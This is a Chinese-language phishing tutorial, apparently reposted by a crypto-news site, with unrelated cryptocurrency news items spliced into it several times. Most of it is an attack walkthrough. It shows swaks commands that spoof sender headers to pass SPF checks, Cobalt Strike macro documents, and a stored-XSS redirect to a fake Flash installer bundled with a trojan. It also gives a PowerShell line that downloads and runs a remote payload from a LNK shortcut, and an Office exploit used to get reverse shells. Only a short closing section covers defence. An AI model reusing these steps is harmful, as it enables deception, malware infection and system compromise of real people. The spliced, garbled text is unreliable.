COM:釣魚與反釣魚技術淺析_SMT

釣魚與反釣魚技術淺析

1.郵箱釣魚

0X00郵箱偽造技術

0X01Swaks偽造郵件

swaks堪稱SMTP協議的瑞士軍刀，使用它我們可以靈活的操作SMTP協議報文

通常最簡單的發送命令：

swaks--touser@example.com--servertest-server.example.net

同時，SPF檢測會FAIL

0x01smtp2go

smtp2go主要是相當于郵件托管，可以分發子賬戶進行發送。地址：https://support.smtp2go.com/hc/en-gb普通賬戶可以免費發1000封郵件。分配好賬戶后，可以通過swaks進行登錄發送郵件：

0x02swaks發送郵件

swaks--totest@gmail.com--fromadmin@qq.com--ehlogmail.com--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASS>

但是上面這個郵件無法繞過SPF

0x03SPF驗證原理

如果mail.smtp2go.com是我的郵件服務器，那么gmail服務器收到的源IP也肯定是mail.smtp2go.com的IP。gmail會校驗郵件發送者的IP是否存在于smtp.from的域名spf配置列表里。而上面這條命令：

waks--totest@gmail.com--fromadmin@qq.com--ehlogmail.com--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASS>

smtp.from就是admin@qq.com，和mail.smtp2go.com的IP肯定不同，所以SPF校驗失敗，而校驗失敗的郵件，會有很高的幾率被扔到垃圾郵件中。默認情況下，如果未設置Mail.From也就是郵件頭的From，則會使用smtp.from作為Mail.From

0x04繞過SPF

由于郵件顯示的是Header中的From不是smtp.from，因此可以將smtp.from設置為正常的郵件服務器地址，偽造一個Mail.From即可

swaks--toceshi@aliyun.com--fromxx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASSS>

DEUS：DEI攻擊者已退還BSC鏈上約107萬美元資產:5月7日消息，DeFi協議DEUS發推特確認稱，DEI攻擊者地址之一（0xdf610228開頭）已經將1,070,127枚Binance-PegDaiToken（價值約107萬美元）轉入DEUS團隊控制的BSC鏈上多簽地址。

此前報道，DEUS推出的穩定幣DEI昨日遭黑客攻擊，損失已超630萬美元，DEUS今日表示，如果資金被退回，他們將不會采取任何法律行動，20%的資金將作為漏洞賞金。[2023/5/7 14:48:07]

Gmail接收到這封郵件后，會校驗--from?xx@smtp2go.com?中的smtp2go.com是否等于mail.smtp2go.com的IP，由于是相等的，所以完成了SPF的校驗。而DKIM是校驗郵件完整性的，smtp2go與Gmail直接使用的是TLS，不會發生什么問題

代0x05Header

swaks支持自定義某些Header，參數如下：

swaks--header-<Name><Value>

如果我想去除Mailer特征，就可以這么做：

swaks--header-X-Mailergmail.com--toceshi@aliyun.com--from?xx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com?--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASSS>

0x06附件、釣魚

swaks--header-X-Mailergmail.com--toceshi@aliyun.com--from?xx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com?--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASSS>?--attach/tmp/sss.rtf

定制發送：

swaks--data/tmp/mail.data--header-X-Mailergmail.com--to?ceshi@aliyun.com--fromxx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com--bodyhello--server?mail.smtp2go.com-p2525-au<USER>-ap<PASSS>--attach

/tmp/sss.rtf/tmp/mail.data中是原始的郵件報文。

0x07Python實現碼

加密交易平臺Bittrue遭遇攻擊，損失約2440萬美元:4月14日消息，加密交易平臺 Bittrue 遭遇攻擊，損失約 2440 萬美元。被盜資金被保留在 0x181 開頭的地址中，攻擊者已兌換出 8,858 枚 ETH。

金色財經此前報道，據PeckShield監測，QNT在3小時內下跌了11%。Bitrue Drainer標記的地址用17.3萬枚QNT，225.5億枚SHIB，4640萬枚GALA和31萬枚MATIC交換了約8,540枚ETH。[2023/4/14 14:04:36]

#!/usr/bin/python

#-*-coding:UTF-8-*-

importsmtplib

fromemail.mime.textimportMIMEText

fromemail.headerimportHeader

mail_host="mail.smtp2go.com"

mail_user=""

mail_pass=""

sender='test@smtp2go.com'

receivers=

message=MIMEText('HelloWorld','plain','utf-8')

message=Header("from@qq.com",'utf-8')

message=?Header(receivers,'utf-8')

subject='SMTP郵件測試'

message=Header(subject,'utf-8')

try:

????smtpObj=smtplib.SMTP()

????smtpObj.connect(mail_host,25)

????smtpObj.login(mail_user,mail_pass)

????smtpObj.sendmail(sender,receivers,message.as_string())

????print"Success"

exceptsmtplib.SMTPException:

????print"Error"s附件攜馬技術

2?.?Office釣魚

0X00CobaltStrike生成一個office的宏

英國加密推廣法案有望在2023年底前出臺:金色財經報道，英國財政部周二在一條推文中表示，加密貨幣推廣立法有望在今年晚些時候生效。《金融服務和市場法》草案于周一公布。它將使金融行為監管局（FCA）能夠根據《金融服務和市場法》（FSMA）中規定的現有推廣法來監管加密公司。財政部在一條推文中表示，這些規定旨在允許英國政府嘗試保護消費者免受“誤導性加密資產促銷”的影響。

該立法還包括對加密貨幣公司的限時豁免，這將允許那些在FCA注冊的公司有機會審批和刊登自己的廣告。一些公司是FSMA下的授權公司，因此可以批準他們自己的廣告。該措施的隨附文件估計，如果廣告由第三方審批，公司將花費5,000英鎊至15,000英鎊（6,168美元至18,504美元）才能獲得認可，具體取決于“材料的復雜性”。議會將很快討論金融服務和市場法修正案。[2023/3/29 13:31:45]

0X01打開Word文檔，點擊“Word選項—自定義功能區—開發者工具(勾選)—確定”

0X02編寫主體內容后，點擊“開發工具—VisualBasic”，雙擊“ThisDocument”，將原有內容全部清空，然后將剛剛生成的宏惡意代碼全部粘貼進去，保存并關閉該VBA編輯器。

0X03然后將文檔發送給別人，內容可以是任何誘惑性的文字，比如通知等，可以針對目標進行相對的文字說明

Office正常情況下是不啟用的宏的，可以誘導用戶啟用

可以通過如下等文字心里暗示

當點擊啟用宏的時候，木馬就上線了

3.?XSS+flash釣魚

0x01準備工作

一臺服務器，一個域名，一個木馬

0x02網頁構造

源碼地址：https://github.com/r00tSe7en/Fake-flash.cn?偽造后是下面這個樣子，當然我這是半成品，實戰過程中需要購買相似性特別強的域名用來迷惑

修改木馬下載地址

安恒信息、趣鏈等6家公司1.03億元入股杭州數字基金:金色財經消息，安恒信息公司及全資子公司德源安恒與杭州金投企業管理有限公司、杭州金投數字科技集團有限公司、迪安診斷技術集團股份有限公司、紫光恒越（杭州）技術有限公司、杭州趣鏈科技有限公司、眾連智能科技有限公司 6 家企業共同投資杭州數字智匯股權投資基金合伙企業（簡稱杭州數字基金）（有限合伙）。

據悉，杭州數字基金認繳規模為 1.03 億元，其中安恒信息作為有限合伙人出資 1573 萬元，德源安恒作為普通合伙人、基金管理人暨執行事務合伙人出資 100 萬元，合計投資人民幣 1673 萬元。天眼查上的工商資料顯示，杭州數字基金成立于 2021 年 11 月 11 日，注冊資本為 9800 萬元，杭州市金融投資集團有限公司和杭州金投企業管理有限公司擁有 100% 的股份，其中杭州市金融投資集團有限公司由杭州市人民政府控股。[2022/8/26 12:49:25]

0x03木馬生成

??在flash官網找到安裝包，下載下來與木馬捆綁在一起。去生成自己的木馬，這里使用CobaltStrike作為演示

將兩個文件放在一起

同時選中官方文件和木馬，用winrar創建自解壓文件。

選擇高級-自解壓選項-更新-覆蓋所有文件

設置解壓路徑

設置提取后運行的文件,分別把正常程序和木馬運行路徑填入

設置模式全部隱藏

點擊確定后生成文件

標準普爾：穩定幣仍可能在后 Terra 中占主導地位:金色財經報道，信用評級機構標準普爾全球評級的分析師周四在網絡研討會上表示，盡管Luna基金會的 terraUSD 最近倒閉，但穩定幣可能成為金融世界的系統性特征。該技術是一種所謂的穩定的價值來源，為更多波動的加密資產提供了一座橋梁，但仍可能改變國際金融和全球貿易，即使使最近的市場動蕩表明一些加密貨幣比其他一些加密貨幣更穩定。

標準普爾全球首席經濟學家 Paul Gruenwald表示，terra的大幅貶值證明加密貨幣發行者需要通過與傳統金融一樣的的障礙。傳統金融家將無情地利用任何對其保值能力做出虛假承諾的貨幣，加密市場也不例外。與傳統金融一樣，同樣的規則適用，同樣的可信度適用，并表示與美元掛鉤的資產將需要某種高質量、流動性強的美元資產以得到某種支持投資組合，以確保該制度是可信的。（Coindesk）[2022/6/24 1:27:53]

為了更具有迷惑性使用ResourceHacker修改圖標，將文件拖入后選擇操作-替換圖標

選擇正常的flash

然后放在目錄下

0x03利用

找到有存儲型xss漏洞的網站，這里以本地dvwa靶場為例，插入以下代碼

<script>alert(“您的flash版本過低，請嘗試升級后訪問該頁面”);window.location.href=”http://192.168.121.175/”;</script>

由于是存儲型XSS，所以每次訪問這個頁面都會彈窗并且點擊確定后強制跳轉至我們的釣魚頁面

點擊下載后，運行exe，我們就成功了。

成功上線

4.?快捷方式釣魚

4.1快捷方式文件釣魚

lnk文件是用于指向其他文件的一種文件。這些文件通常稱為快捷方式文件，通常它以快捷方式放在硬盤上，以方便使用者快速的調用。lnk釣魚主要將圖標偽裝成正常圖標，但是目標會執行shell命令。

同樣使用CobaltStrike生成相應的木馬代碼

會得到一串powershell代碼

Powershell.exe-nop-whidden-c"IEX((new-objectnet.webclient).downloadstring('http://192.168.121.156:80/a'))"

然后新建快捷方式將上面的powershell語句填入

下一步，然后自己命名一下，點擊完成

可以更改圖標使其更具有誘惑性

當受害者雙擊之后就會自動執行我們的惡意payload,從目標網站下載并執行。

最終被得到shell。

偽裝完畢

發送給目標點擊后直接上線

4.2欺騙釣魚：

同樣，利用CobaltStrike生成一個惡意木馬程序

利用最開始提到的郵箱偽造技術或者通過其他手段拿到內部人員的郵箱賬號

發送假的通知

當目標群體下載附件運行以后，就上線了

同樣，上面提到的word也可以用這種方式來進行釣魚攻擊

5.0day/nday漏洞釣魚

雙殺漏洞

0x00將CVE-2018-8147利用程序下載到本地并且進入相關目

本機IP：192.168.121.129

0x01執行命令生成payload

開啟web服務并且將exp.html和test.rtf復制到web服務目錄下面

攻擊方式一：

0x00本地監聽上述的7777端口

0x01然后將地址發送給目標用戶誘導其點開

對應網頁會報錯

觀察我們的監聽機器

成功反彈shell

可以執行任意命令

攻擊方式二：

剛剛的文檔，我們可以改名為具有誘惑性的標題

同樣開啟監聽

發給用戶

誘導點開

然后同樣會反彈shell

總結

網絡釣魚已成為實施電子犯罪的更常見手段。據統計，網絡釣魚電子郵件在全球郵件流量中所占的份額超過50％，用戶的15％至少遭受一次網絡釣魚攻擊，攻擊公司的比例為85％。大約80％的攻擊是盜竊資金。大多數網絡釣魚活動都是短期的。

每次研究人員想出任何發現和預防網絡釣魚的想法時，網絡釣魚者都會使用當前解決方案中發現的漏洞來更改其攻擊策略。網絡釣魚詐騙可以通過惡意軟件或社會工程來執行，后者指的是使用假冒的網頁或電子郵件。

當前，沒有任何工具可提供100％的防護以防止網絡釣魚攻擊，因為這些攻擊大多數都是人為因素。由于區塊鏈是一項需要投資的快速發展的新技術，因此對區塊鏈項目的網絡釣魚攻擊數量每年都將增加。

受網絡釣魚攻擊影響的人員和公司最常見的錯誤是：

1）對基礎設施的保護不足；

2）轉到從信件到虛假網站的鏈接；

3）從騙局消息中啟動惡意腳本；

4）信任欺詐性的廣告活動，保證快速簡便的收入；

5）社交網絡中的保護水平不足；

6）對包含SSL證書的網站的過度信任；

7）投資ICO時對項目的了解不足;

8）無法使用現代的防御網絡釣魚攻擊的方法。

整體解決方案：

1）使用書簽代替鏈接；

2）使用帶有反網絡釣魚擴展名的瀏覽器，

3）安裝反網絡釣魚軟件，

4）禁止點擊鏈接和下載可疑附件；

5）使用服務之前對SSL證書進行身份驗證；

6）發布加密錢包的離線副本;

7）使用雙重身份驗證復雜密碼;

8）拒絕公共Wi-Fi，使用安全網關。

來源：金色財經

Tags：COMMAIMTPSMTBitcoMineHUMAI幣MTP幣SMTS

幣贏